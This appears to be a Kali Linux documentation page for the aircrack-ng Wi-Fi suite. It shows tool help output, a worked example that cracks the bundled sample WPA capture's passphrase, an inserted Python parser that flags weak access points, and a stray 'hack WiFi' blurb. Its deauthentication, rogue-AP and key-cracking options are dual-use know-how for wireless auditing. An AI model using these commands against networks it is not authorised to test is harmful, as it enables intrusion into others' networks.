airmon-ng Usage Examples
Entering the airmon-ng command without parameters will show the interfaces status.
```
root@kali:~# airmon-ng

PHY	Interface	Driver		Chipset

phy0	wlan0		ath9k_htc	Atheros Communications, Inc. AR9271 802.11n
```
A number of processes can interfere with Airmon-ng. Using the check option will display any processes that might be troublesome and the check kill option will kill them for you.
```
root@kali:~# airmon-ng check

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  465 NetworkManager
  515 dhclient
 1321 wpa_supplicant

root@kali:~# airmon-ng check kill

Killing these processes:

  PID Name
  515 dhclient
 1321 wpa_supplicant
```
Enable monitor mode (start) on the given wireless interface (wlan0), fixed on channel 6. A new interface will be created (wlan0mon in our case), which is the interface name you will need to use in other applications.
```
root@kali:~# airmon-ng start wlan0 6

PHY	Interface	Driver		Chipset

phy0	wlan0		ath9k_htc	Atheros Communications, Inc. AR9271 802.11n

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)
```
The stop option will destroy the monitor mode interface and place the wireless interface back into managed mode.
```
root@kali:~# airmon-ng stop wlan0mon

PHY	Interface	Driver		Chipset

phy0	wlan0mon	ath9k_htc	Atheros Communications, Inc. AR9271 802.11n

		(mac80211 station mode vif enabled on [phy0]wlan0)
		(mac80211 monitor mode vif disabled for [phy0]wlan0mon)
```
airdecap-ng Usage Examples
With a given ESSID (-e test) and password (-p biscotte), decrypt the specified WPA capture (-r /usr/share/doc/aircrack-ng/examples/wpa.cap). The tcpdump runs before and after show what the decryption changes: the encrypted 802.11 data frames become plain Ethernet frames.
```
root@kali:~# tcpdump -r wpa.cap
reading from file wpa.cap, link-type PRISM_HEADER (802.11 plus Prism header)
03:01:06.609737 Beacon (test) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 7, PRIVACY[|802.11]
03:01:06.678714 EAPOL key (3) v1, len 95
03:01:06.678928 Acknowledgment RA:00:0d:93:eb:b0:8c (oui Unknown)
03:01:06.681525 EAPOL key (3) v1, len 119
03:01:06.681732 Acknowledgment RA:00:09:5b:91:53:5d (oui Unknown)
03:01:06.684370 EAPOL key (3) v1, len 119
03:01:06.684584 Acknowledgment RA:00:0d:93:eb:b0:8c (oui Unknown)
03:01:06.685502 EAPOL key (3) v1, len 95
03:01:06.685708 Acknowledgment RA:00:09:5b:91:53:5d (oui Unknown)
03:01:06.686775 Data IV:12000 Pad 20 KeyID 0
03:01:06.686984 Acknowledgment RA:00:0d:93:eb:b0:8c (oui Unknown)
03:01:06.688139 Data IV:12000 Pad 20 KeyID 0
03:01:06.688344 Acknowledgment RA:00:09:5b:91:53:5d (oui Unknown)

root@kali:~# airdecap-ng -e test -p biscotte wpa.cap
Total number of packets read            13
Total number of WEP data packets         0
Total number of WPA data packets         2
Number of plaintext data packets         0
Number of decrypted WEP  packets         0
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets         2

root@kali:~# tcpdump -r wpa-dec.cap
reading from file wpa-dec.cap, link-type EN10MB (Ethernet)
03:01:06.686775 EAPOL key (3) v1, len 127
03:01:06.688139 EAPOL key (3) v1, len 95
```
Packages and Binaries:
aircrack-ng
aircrack-ng is an 802.11a/b/g WEP/WPA cracking program that can recover a 40-bit, 104-bit, 256-bit or 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA1/2 networks with some advanced methods or simply by brute force.
It implements the standard FMS attack along with some optimizations, making the attack much faster than other WEP cracking tools. It can also make full use of a multiprocessor system to speed up the cracking process.
aircrack-ng is a fork of aircrack, as that project has been stopped by the upstream maintainer.
Installed size: 2.33 MB
How to install:
```
sudo apt install aircrack-ng
```
Dependencies:
- ethtool
- hwloc
- iw
- libc6
- libgcc-s1
- libgcrypt20
- libhwloc15
- libnl-3-200
- libnl-genl-3-200
- libpcap0.8
- libpcre3
- libsqlite3-0
- libstdc++6
- python3
- rfkill
- usbutils
- wireless-tools
- zlib1g
airbase-ng
Multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself
```
root@kali:~# airbase-ng --help

  Airbase-ng 1.7  - (C) 2008-2022 Thomas d'Otreppe
  Original work: Martin Beck
  https://www.aircrack-ng.org

  usage: airbase-ng

  Options:

      -a bssid         : set Access Point MAC address
      -i iface         : capture packets from this interface
      -w WEP key       : use this WEP key to en-/decrypt packets
      -h MAC           : source mac for MITM mode
      -f disallow      : disallow specified client MACs (default: allow)
      -W 0|1           : [don't] set WEP flag in beacons 0|1 (default: auto)
      -q               : quiet (do not print statistics)
      -v               : verbose (print more messages)
      -A               : Ad-Hoc Mode (allows other clients to peer)
      -Y in|out|both   : external packet processing
      -c channel       : sets the channel the AP is running on
      -X               : hidden ESSID
      -s               : force shared key authentication (default: auto)
      -S               : set shared key challenge length (default: 128)
      -L               : Caffe-Latte WEP attack (use if driver can't send frags)
      -N               : cfrag WEP attack (recommended)
      -x nbpps         : number of packets per second (default: 100)
      -y               : disables responses to broadcast probes
      -0               : set all WPA,WEP,open tags. can't be used with -z & -Z
      -z type          : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
      -Z type          : same as -z, but for WPA2
      -V type          : fake EAPOL 1=MD5 2=SHA1 3=auto
      -F prefix        : write all sent and received frames into pcap file
      -P               : respond to all probes, even when specifying ESSIDs
      -I interval      : sets the beacon interval value in ms
      -C seconds       : enables beaconing of probed ESSID values (requires -P)
      -n hex           : User specified ANonce when doing the 4-way handshake

  Filter options:
      --bssid MAC      : BSSID to filter/use
      --bssids file    : read a list of BSSIDs out of that file
      --client MAC     : MAC of client to filter
      --clients file   : read a list of MACs out of that file
      --essid ESSID    : specify a single ESSID (default: default)
      --essids file    : read a list of ESSIDs out of that file

      --help           : Displays this usage screen
```
aircrack-ng
A 802.11 WEP / WPA-PSK key cracker
```
root@kali:~# aircrack-ng --help

  Aircrack-ng 1.7  - (C) 2006-2022 Thomas d'Otreppe
  https://www.aircrack-ng.org

  usage: aircrack-ng [options]

  Common options:

      -a  : force attack mode (1/WEP, 2/WPA-PSK)
      -e  : target selection: network identifier
      -b  : target selection: access point's MAC
      -p  : # of CPU to use  (default: all CPUs)
      -q  : enable quiet mode (no status output)
      -C  : merge the given APs to a virtual one
      -l  : write key to file. Overwrites file.

  Static WEP cracking options:

      -c  : search alpha-numeric characters only
      -t  : search binary coded decimal chr only
      -h  : search the numeric key for Fritz!BOX
      -d  : use masking of the key (A1:XX:CF:YY)
      -m  : MAC address to filter usable packets
      -n  : WEP key length :  64/128/152/256/512
      -i  : WEP key index (1 to 4), default: any
      -f  : bruteforce fudge factor,  default: 2
      -k  : disable one attack method (1 to 17)
      -x or -x0  : disable bruteforce for last keybytes
      -x1 : last keybyte bruteforcing  (default)
      -x2 : enable last  2 keybytes bruteforcing
      -X  : disable  bruteforce   multithreading
      -y  : experimental  single bruteforce mode
      -K  : use only old KoreK attacks (pre-PTW)
      -s  : show the key in ASCII while cracking
      -M  : specify maximum number of IVs to use
      -D  : WEP decloak, skips broken keystreams
      -P  : PTW debug:  1: disable Klein, 2: PTW
      -1  : run only 1 try to crack key with PTW
      -V  : run in visual inspection mode

  WEP and WPA-PSK cracking options:

      -w  : path to wordlist(s) filename(s)
      -N  : path to new session filename
      -R  : path to existing session filename

  WPA-PSK options:

      -E  : create EWSA Project file v3
      -I  : PMKID string (hashcat -m 16800)
      -j  : create Hashcat v3.6+ file (HCCAPX)
      -J  : create Hashcat file (HCCAP)
      -S  : WPA cracking speed test
      -Z  : WPA cracking speed test length of execution.
      -r  : path to airolib-ng database
            (Cannot be used with -w)

  SIMD selection:

      --simd-list       : Show a list of the available
                          SIMD architectures, for this machine.
      --simd=
```
airdecap-ng
Decrypt a WEP/WPA crypted pcap file
```
root@kali:~# airdecap-ng --help

  Airdecap-ng 1.7  - (C) 2006-2022 Thomas d'Otreppe
  https://www.aircrack-ng.org

  usage: airdecap-ng [options]

  Common options:
      -l         : don't remove the 802.11 header
      -b         : access point MAC address filter
      -e         : target network SSID
      -o         : output file for decrypted packets (default -dec)

  WEP specific option:
      -w         : target network WEP key in hex
      -c         : output file for corrupted WEP packets (default -bad)

  WPA specific options:
      -p         : target network WPA passphrase
      -k         : WPA Pairwise Master Key in hex

      --help     : Displays this usage screen

  If your capture contains any WDS packet, you must specify the -b
  option (otherwise only packets destined to the AP will be decrypted)
```
airdecloak-ng
Removes WEP cloaked frames from a pcap file.
```
root@kali:~# airdecloak-ng -h

  Airdecloak-ng 1.7  - (C) 2008-2022 Thomas d'Otreppe
  https://www.aircrack-ng.org

  usage: airdecloak-ng [options]

  options:

   Mandatory:
     -i                   : Input capture file
     --ssid               : ESSID of the network to filter
        or
     --bssid              : BSSID of the network to filter

   Optional:
     -o                   : Output packets (valid) file (default: -filtered.pcap)
     -c                   : Output packets (cloaked) file (default: -cloaked.pcap)
     -u                   : Output packets (unknown/ignored) file (default: invalid_status.pcap)
     --filters            : Apply filters (separated by a comma). Filters:
           signal:               Try to filter based on signal.
           duplicate_sn:         Remove all duplicate sequence numbers
                                 for both the AP and the client.
           duplicate_sn_ap:      Remove duplicate sequence number for
                                 the AP only.
           duplicate_sn_client:  Remove duplicate sequence number for the
                                 client only.
           consecutive_sn:       Filter based on the fact that IV should
                                 be consecutive (only for AP).
           duplicate_iv:         Remove all duplicate IV.
           signal_dup_consec_sn: Use signal (if available), duplicate and
                                 consecutive sequence number (filtering
                                 is much more precise than using all these
                                 filters one by one).
     --null-packets       : Assume that null packets can be cloaked.
     --disable-base_filter: Do not apply base filter.
     --drop-frag          : Drop fragmented packets

     --help               : Displays this usage screen
```
aireplay-ng
Inject packets into a wireless network to generate traffic
```
root@kali:~# aireplay-ng --help

  Aireplay-ng 1.7  - (C) 2006-2022 Thomas d'Otreppe
  https://www.aircrack-ng.org

  usage: aireplay-ng

  Filter options:

      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -u type   : frame control, type    field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -w iswep  : frame control, WEP     bit
      -D        : disable AP detection

  Replay options:

      -x nbpps  : number of packets per second
      -p fctrl  : set frame control word (hex)
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination  MAC address
      -h smac   : set Source       MAC address
      -g value  : change ring buffer size (default: 8)
      -F        : choose first matching packet

      Fakeauth attack options:

      -e essid  : set target AP SSID
      -o npckts : number of packets per burst (0=auto, default: 1)
      -q sec    : seconds between keep-alives
      -Q        : send reassociation requests
      -y prga   : keystream for shared key auth
      -T n      : exit after retry fake auth request n time

      Arp Replay attack options:

      -j        : inject FromDS packets

      Fragmentation attack options:

      -k IP     : set destination IP in fragments
      -l IP     : set source IP in fragments

      Test attack options:

      -B        : activates the bitrate test

  Source options:

      -i iface  : capture packets from this interface
      -r file   : extract packets from this pcap file

  Miscellaneous options:

      -R                    : disable /dev/rtc usage
      --ignore-negative-one : if the interface's channel can't be determined,
                              ignore the mismatch, needed for unpatched cfg80211
      --deauth-rc rc        : Deauthentication reason code [0-254] (Default: 7)

  Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream (-5)
      --caffe-latte       : query a client for new IVs (-6)
      --cfrag             : fragments against a client (-7)
      --migmode           : attacks WPA migration mode (-8)
      --test              : tests injection and quality (-9)

      --help              : Displays this usage screen
```
airmon-ng
POSIX sh script designed to turn wireless cards into monitor mode.
```
root@kali:~# airmon-ng -h
usage: airmon-ng [channel or frequency]
```
airodump-ng
A wireless packet capture tool for aircrack-ng
```
root@kali:~# airodump-ng --help

  Airodump-ng 1.7  - (C) 2006-2022 Thomas d'Otreppe
  https://www.aircrack-ng.org

  usage: airodump-ng [,,...]

  Options:
      --ivs                 : Save only captured IVs
      --gpsd                : Use GPSd
      --write               : Dump file prefix
      -w                    : same as --write
      --beacons             : Record all beacons in dump file
      --update              : Display update delay in seconds
      --showack             : Prints ack/cts/rts statistics
      -h                    : Hides known stations for --showack
      -f                    : Time in ms between hopping channels
      --berlin              : Time before removing the AP/client
                              from the screen when no more packets
                              are received (Default: 120 seconds)
      -r                    : Read packets from that file
      -T                    : While reading packets from a file,
                              simulate the arrival rate of them as if
                              they were "live".
      -x                    : Active Scanning Simulation
      --manufacturer        : Display manufacturer from IEEE OUI list
      --uptime              : Display AP Uptime from Beacon Timestamp
      --wps                 : Display WPS information (if any)
      --output-format       : Output format. Possible values:
                              pcap, ivs, csv, gps, kismet, netxml, logcsv
      --ignore-negative-one : Removes the message that says
                              fixed channel : -1
      --write-interval      : Output file(s) write interval in seconds
      --background          : Override background detection.
      -n                    : Minimum AP packets recv'd before
                              for displaying it

  Filter options:
      --encrypt             : Filter APs by cipher suite
      --netmask             : Filter APs by mask
      --bssid               : Filter APs by BSSID
      --essid               : Filter APs by ESSID
      --essid-regex         : Filter APs by ESSID using a regular
                              expression
      -a                    : Filter unassociated clients

  By default, airodump-ng hops on 2.4GHz channels.
  You can make it capture on other/specific channel(s) by using:
      --ht20                : Set channel to HT20 (802.11n)
      --ht40-               : Set channel to HT40- (802.11n)
      --ht40+               : Set channel to HT40+ (802.11n)
      --channel             : Capture on specific channels
      --band                : Band on which airodump-ng should hop
      -C                    : Uses these frequencies in MHz to hop
      --cswitch             : Set channel switching method
                    0       : FIFO (default)
                    1       : Round Robin
                    2       : Hop on last
      -s                    : same as --cswitch

      --help                : Displays this usage screen
```
airodump-ng-oui-update
IEEE oui list updater for airodump-ng
```
root@kali:~# man airodump-ng-oui-update

AIRODUMP-NG-OUI-UPDATE(8)      System Manager's Manual      AIRODUMP-NG-OUI-UPDATE(8)

NAME
       airodump-ng-oui-updater - IEEE oui list updater for airodump-ng

SYNOPSIS
       airodump-ng-oui-updater

DESCRIPTION
       airodump-ng-oui-updater downloads and parses IEEE OUI list.

AUTHOR
       This manual page was written by David Francos Cuartero. Permission is
       granted to copy, distribute and/or modify this document under the terms
       of the GNU General Public License, Version 2 or any later version
       published by the Free Software Foundation

       On Debian systems, the complete text of the GNU General Public License
       can be found in /usr/share/common-licenses/GPL.

SEE ALSO
       airbase-ng(8) aireplay-ng(8) airmon-ng(8) airodump-ng(8) airserv-ng(8)
       airtun-ng(8) besside-ng(8) easside-ng(8) tkiptun-ng(8) wesside-ng(8)
       aircrack-ng(1) airdecap-ng(1) airdecloak-ng(1) airolib-ng(1)
       besside-ng-crawler(1) buddy-ng(1) ivstools(1) kstats(1) makeivs-ng(1)
       packetforge-ng(1) wpaclean(1) airventriloquist(8)

Version 1.7.0                        May 2022            AIRODUMP-NG-OUI-UPDATE(8)
```
airolib-ng
Manage and create a WPA/WPA2 pre-computed hashes tables
```
root@kali:~# airolib-ng -h
Airolib-ng 1.7  - (C) 2007, 2008, 2009 ebfe
https://www.aircrack-ng.org

Usage: airolib-ng [options]

Operations:
       --stats                  : Output information about the database.
       --sql                    : Execute specified SQL statement.
       --clean [all]            : Clean the database from old junk. 'all' will also
                                  reduce filesize if possible and run an integrity check.
       --batch                  : Start batch-processing all combinations of ESSIDs
                                  and passwords.
       --verify [all]           : Verify a set of randomly chosen PMKs.
                                  If 'all' is given, all invalid PMK will be deleted.
       --import [essid|passwd]  : Import a text file as a list of ESSIDs or passwords.
       --import cowpatty        : Import a cowpatty file.
       --export cowpatty        : Export to a cowpatty file.
```
airserv-ng
A wireless card server
```
root@kali:~# airserv-ng -h
Airserv-ng 1.7  - (C) 2007, 2008, 2009 Andrea Bittau
https://www.aircrack-ng.org

Usage: airserv-ng

Options:

       -h         : This help screen
       -p         : TCP port to listen on (default:666)
       -d         : Wifi interface to use
       -c         : Channel to use
       -v         : Debug level (1 to 3; default: 1)
```
airtun-ng
A virtual tunnel interface creator for aircrack-ng
```
root@kali:~# airtun-ng --help

  Airtun-ng 1.7  - (C) 2006-2022 Thomas d'Otreppe
  Original work: Martin Beck
  https://www.aircrack-ng.org

  usage: airtun-ng

      -x nbpps         : number of packets per second (default: 100)
      -a bssid         : set Access Point MAC address
                         In WDS Mode this sets the Receiver
      -i iface         : capture packets from this interface
      -y file          : read PRGA from this file
      -w wepkey        : use this WEP-KEY to encrypt packets
      -p pass          : use this WPA passphrase to decrypt packets
                         (use with -a and -e)
      -e essid         : target network SSID (use with -p)
      -t tods          : send frames to AP (1) or to client (0)
                         or tunnel them into a WDS/Bridge (2)
      -r file          : read frames out of pcap file
      -h MAC           : source MAC address

  WDS/Bridge Mode options:
      -s transmitter   : set Transmitter MAC address for WDS Mode
      -b               : bidirectional mode. This enables communication
                         in Transmitter's AND Receiver's networks.
                         Works only if you can see both stations.

  Repeater options:
      --repeat         : activates repeat mode
      --bssid          : BSSID to repeat
      --netmask        : netmask for BSSID filter

      --help           : Displays this usage screen
```
airventriloquist-ng
Encrypted WiFi packet injection
```
root@kali:~# airventriloquist-ng --help

  Airventriloquist-ng 1.7  - (C) 2015 Tim de Waal
  https://www.aircrack-ng.org

  usage: airventriloquist-ng [options]

      -i              : Interface to listen and inject on
      -d | --deauth   : Send active deauths to encrypted stations
      -e | --essid    : ESSID of target network
      -p | --passphrase : WPA Passphrase of target network
      -c | --icmp     : Respond to all ICMP frames (Debug)
      -n | --dns      : IP to resolve all DNS queries to
      -s | --hijack   : URL to look for in HTTP requests
                        can have wildcards
                        eg: *jquery*.js*
      -r | --redirect : URL to redirect to
      -v | --verbose  : Verbose output
      --help          : This super helpful message
```
besside-ng
Crack a WEP or WPA key without user intervention and collaborate with WPA cracking statistics
```
root@kali:~# besside-ng -h
Besside-ng 1.7  - (C) 2010 Andrea Bittau
https://www.aircrack-ng.org

Usage: besside-ng [options]

Options:

	-b		Victim BSSID
	-R		Victim ESSID regex (requires PCRE)
	-s		Upload wpa.cap for cracking
	-c		chanlock
	-p		flood rate
	-W		WPA only
	-v		verbose, -vv for more, etc.
	-h		This help screen
```
besside-ng-crawler
Filter EAPOL frames from a directory of capture files.
```
root@kali:~# besside-ng-crawler -h
Use: besside-ng-crawler

What does it do?

It recurses the SearchDir directory
Opens all files in there, searching for pcap-dumpfiles
Filters out a single beacon and all EAPOL frames from the WPA networks in there
And saves them to CapFileOut.
```
buddy-ng
A tool to work with easside-ng
```
root@kali:~# buddy-ng -h
Buddy-ng 1.7  - (C) 2007,2008 Andrea Bittau
https://www.aircrack-ng.org

Usage: buddy-ng

Options:

	-h	: This help screen
	-p	: Don't drop privileges
```
dcrack
```
root@kali:~# dcrack -h
Unknown cmd -h
dcrack v0.3

Usage: dcrack.py [MODE]

server
	Runs coordinator

client
	Runs cracker

cmd
	Sends a command to server

[CMD] can be:
	dict
	cap
	crack
	remove
	status
```
easside-ng
An auto-magic tool which allows you to communicate via an WEP-encrypted AP without knowing the key
```
root@kali:~# easside-ng -h
Easside-ng 1.7  - (C) 2007, 2008, 2009 Andrea Bittau
https://www.aircrack-ng.org

Usage: easside-ng

Options:

       -h         : This help screen
       -v         : Victim BSSID
       -m         : Source MAC address
       -i         : Source IP address
       -r         : Router IP address
       -s         : Buddy-ng IP address (mandatory)
       -f         : Interface to use (mandatory)
       -c         : Lock card to this channel
       -n         : Determine Internet IP only
```
ivstools
Extract IVs from a pcap file or merges several .ivs files into one
```
root@kali:~# ivstools -h

  ivsTools 1.7  - (C) 2006-2022 Thomas d'Otreppe
  https://www.aircrack-ng.org

  usage: ivstools --convert
        Extract ivs from a pcap file
       ivstools --merge ..
```
kstats
Show statistical FMS algorithm votes for an ivs dump and a specified WEP key
```
root@kali:~# kstats -h
usage: kstats <104-bit key>
```
makeivs-ng
Generate a dummy IVS dump file with a specific WEP key
```
root@kali:~# makeivs-ng -h

  makeivs-ng 1.7  - (C) 2006-2022 Thomas d'Otreppe
  https://www.aircrack-ng.org

  usage: makeivs-ng [options]

  Common options:
      -b         : Set access point MAC address
      -f         : Number of first IV
      -k         : Target network WEP key in hex
      -s         : Seed used to setup random generator
      -w         : Filename to write IVs into
      -c         : Number of IVs to generate
      -d         : Percentage of dupe IVs
      -e         : Percentage of erroneous keystreams
      -l         : Length of keystreams
      -n         : Ignores weak IVs
      -p         : Uses prng algorithm to generate IVs

      --help     : Displays this usage screen
```
packetforge-ng
Forge packets: ARP, UDP, ICMP or custom packets.
```
root@kali:~# packetforge-ng --help

  Packetforge-ng 1.7  - (C) 2006-2022 Thomas d'Otreppe
  Original work: Martin Beck
  https://www.aircrack-ng.org

  Usage: packetforge-ng

  Forge options:

      -p           : set frame control word (hex)
      -a           : set Access Point MAC address
      -c           : set Destination  MAC address
      -h           : set Source       MAC address
      -j           : set FromDS bit
      -o           : clear ToDS bit
      -e           : disables WEP encryption
      -k           : set Destination IP [Port]
      -l           : set Source      IP [Port]
      -t ttl       : set Time To Live
      -w           : write packet to this pcap file
      -s           : specify size of null packet
      -n           : set number of packets to generate

  Source options:

      -r           : read packet from this raw file
      -y           : read PRGA from this file

  Modes:

      --arp        : forge an ARP packet    (-0)
      --udp        : forge an UDP packet    (-1)
      --icmp       : forge an ICMP packet   (-2)
      --null       : build a null packet    (-3)
      --custom     : build a custom packet  (-9)

      --help       : Displays this usage screen
```
tkiptun-ng
Inject a few frames into a WPA TKIP network with QoS
```
root@kali:~# tkiptun-ng --help

  Tkiptun-ng 1.7  - (C) 2008-2022 Thomas d'Otreppe
  https://www.aircrack-ng.org

  usage: tkiptun-ng

  Filter options:

      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length (default: 80)
      -n len    : maximum packet length (default: 80)
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -D        : disable AP detection
      -Z        : select packets manually

  Replay options:

      -x nbpps  : number of packets per second
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination  MAC address
      -h smac   : set Source       MAC address
      -e essid  : set target AP SSID
      -M sec    : MIC error timeout in seconds [60]

  Debug options:

      -K prga   : keystream for continuation
      -y file   : keystream-file for continuation
      -j        : inject FromDS packets
      -P pmk    : pmk for verification/vuln testing
      -p psk    : psk to calculate pmk with essid

  source options:

      -i iface  : capture packets from this interface
      -r file   : extract packets from this pcap file

      --help    : Displays this usage screen
```
wesside-ng
Crack a WEP key of an open network without user intervention
```
root@kali:~# wesside-ng -h
Wesside-ng 1.7  - (C) 2007, 2008, 2009 Andrea Bittau
https://www.aircrack-ng.org

Usage: wesside-ng

Options:

       -h         : This help screen
       -i         : Interface to use (mandatory)
       -m         : My IP address
       -n         : Network IP address
       -a         : Source MAC Address
       -c         : Do not crack the key
       -p         : Minimum bytes of PRGA to gather
       -v         : Victim BSSID
       -t         : Cracking threshold
       -f         : Highest scanned chan (default: 11)
       -k         : Ignore acks and tx txnum times
```
wpaclean
Clean wpa capture files
```
root@kali:~# wpaclean -h
Usage: wpaclean [in2.cap] [...]
```
airgraph-ng
airgraph-ng is a tool to create a graph out of the txt file created by airodump with its -w option. The graph shows the relationships between the clients and the access points.
Installed size: 106 KB
How to install:
```
sudo apt install airgraph-ng
```
Dependencies:
- graphviz
- python3
airgraph-ng
A 802.11 visualization utility
```
root@kali:~# airgraph-ng -h
usage: airgraph-ng [-h] [-o OUTPUT] [-i INPUT] [-g GRAPH_TYPE] [-d]

Generate Client to AP Relationship (CAPR) and Common probe graph (CPG) from a
airodump-ng CSV file

options:
  -h, --help            show this help message and exit
  -o OUTPUT, --output OUTPUT
                        Our Output Image ie... Image.png
  -i INPUT, --input INPUT
                        Airodump-ng txt file in CSV format. NOT the pcap
  -g GRAPH_TYPE, --graph GRAPH_TYPE
                        Graph Type Current [CAPR (Client to AP Relationship)
                        OR CPG (Common probe graph)]
  -d, --dotfile         Keep the dot graph file after the export to the PNG
                        image has been done
```
airodump-join
A support tool for airgraph-ng that allows you to join the airodump output files.
```
root@kali:~# airodump-join -h
Usage: airodump-join [options] arg1 arg2 arg3 .....

Options:
  -h, --help            show this help message and exit
  -o OUTPUT, --output=OUTPUT
                        output file to write to
  -i FILENAME, --file=FILENAME
                        Input files to read data from requires at least two
                        arguments
```
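airgraph-ng and airodump-join both consume the CSV that airodump-ng writes with -w. The following is an added example, not part of this page or of the aircrack-ng project, that parses a constructed airodump-ng style CSV with Python's standard library and turns it into the inventory a defender wants from a site survey: every access point with its privacy setting (flagged when it is open or still on WEP) and every unassociated client together with the SSIDs it is probing for. The column layout (an AP table, a blank line, then a Station MAC table, each with its own header row) is assumed from airodump-ng's usual output; all addresses, times and names in the sample are constructed, and parse_airodump_csv, weak_access_points and probing_clients are names chosen for this example.

```python
import csv
import io

# Constructed sample in the layout airodump-ng -w writes to <prefix>-01.csv.
# Column order is assumed from airodump-ng's usual output; every value is made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:0D:93:EB:B0:8C, 2023-08-10 03:01:06, 2023-08-10 03:05:10,  7,  54, WPA2, CCMP, PSK, -40,  120,   0,   0.  0.  0.  0,   4, test, 
00:11:22:33:44:55, 2023-08-10 03:01:10, 2023-08-10 03:05:09,  6,  11, WEP, WEP, , -62,   80,  30566,   0.  0.  0.  0,   9, legacy-ap, 
66:77:88:99:AA:BB, 2023-08-10 03:01:12, 2023-08-10 03:05:08,  1,  54, OPN, , , -70,   40,   0,   0.  0.  0.  0,   8, GuestNet, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:09:5B:91:53:5D, 2023-08-10 03:01:06, 2023-08-10 03:05:10, -45,  200, 00:0D:93:EB:B0:8C, test
AA:BB:CC:DD:EE:01, 2023-08-10 03:02:00, 2023-08-10 03:05:01, -75,   12, (not associated), HomeWiFi,CoffeeShop
"""

# Privacy values that mean the link offers no usable confidentiality.
WEAK_PRIVACY = {"OPN", "WEP"}


def parse_airodump_csv(text):
    """Split an airodump-ng CSV into (aps, stations): two lists of dicts.

    The two tables are separated by a blank line and each carries its own
    header. Fields are stripped because airodump-ng pads them with spaces.
    A station's probed-ESSID list is itself comma separated, so any fields
    beyond the header width are folded back into that last column.
    """
    aps, stations = [], []
    for block in text.strip().split("\n\n"):
        rows = list(csv.reader(io.StringIO(block)))
        if not rows:
            continue
        header = [h.strip() for h in rows[0]]
        target = stations if header[0] == "Station MAC" else aps
        for row in rows[1:]:
            if not row:
                continue
            if len(row) > len(header):
                row = row[: len(header) - 1] + [",".join(row[len(header) - 1 :])]
            target.append({k: v.strip() for k, v in zip(header, row)})
    return aps, stations


def weak_access_points(aps):
    """(BSSID, ESSID, Privacy) for every AP seen open or on WEP: the entries
    that should not exist on a managed estate and need an owner found."""
    return [(ap["BSSID"], ap["ESSID"], ap["Privacy"])
            for ap in aps if ap["Privacy"] in WEAK_PRIVACY]


def probing_clients(stations):
    """Map each unassociated client to the SSIDs it actively probes for.

    A client that broadcasts its saved-network list reveals where it has
    been and will readily join anything answering to those names; the list
    is the starting point for fixing client-side auto-join settings.
    """
    out = {}
    for st in stations:
        probes = [p.strip() for p in st["Probed ESSIDs"].split(",") if p.strip()]
        if st["BSSID"] == "(not associated)" and probes:
            out[st["Station MAC"]] = probes
    return out


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    print(f"{len(aps)} access points, {len(stations)} stations")
    for bssid, essid, privacy in weak_access_points(aps):
        print(f"WEAK  {bssid}  {essid!r}  {privacy}")
    for mac, probes in probing_clients(stations).items():
        print(f"PROBE {mac} -> {', '.join(probes)}")
```

The same two functions can be pointed at several survey files after airodump-join has merged them; the CSV layout does not change with the merge.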
Updated on: 2023-Aug-10
How To Hack WiFi On Raspberry Pi With Kali Linux
Uploaded by Steve Attwood, 23 pages.
Instructions on how to hack WiFi with a Raspberry Pi with the Kali Linux operating system.
airolib-ng Usage Examples
Specify the name of the database to use (airolib-db) and import a file containing the ESSIDs of the network(s) you are targeting (--import essid /root/essid.txt). If the database does not exist, it will be created.
```
root@kali:~# airolib-ng airolib-db --import essid /root/essid.txt
Database does not already exist, creating it...
Database successfully created
Reading file...
Writing...
Done.
```
Import any wordlists you wish to use for PMK computation.
```
root@kali:~# airolib-ng airolib-db --import passwd /usr/share/doc/aircrack-ng/examples/password.lst
Reading file...
Writing... read, 1814 invalid lines ignored.
Done
```
Use the --batch option to compute all PMKs.
```
root@kali:~# airolib-ng airolib-db --batch
Computed 233 PMK in 0 seconds (233 PMK/s, 0 in buffer). All ESSID processed.
```
To use the airolib-ng database with aircrack-ng, use the
-r
option and specify the database name.
```
root@kali:~# aircrack-ng -r airolib-db /root/wpa.cap
Opening /root/wpa.cap
Read 13 packets.

   #  BSSID              ESSID                     Encryption

   1  00:0D:93:EB:B0:8C  test                      WPA (1 handshake)

Choosing first network as target.

Opening /root/wpa.cap
Reading packets, please wait...

                                 Aircrack-ng 1.4

      [00:00:00] 230/0 keys tested (106728.53 k/s)

      Time left: 0 seconds                                     inf%

                           KEY FOUND! [ biscotte ]


      Master Key     : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
                       39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE

      Transient Key  : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
                       73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
                       AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
                       D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD

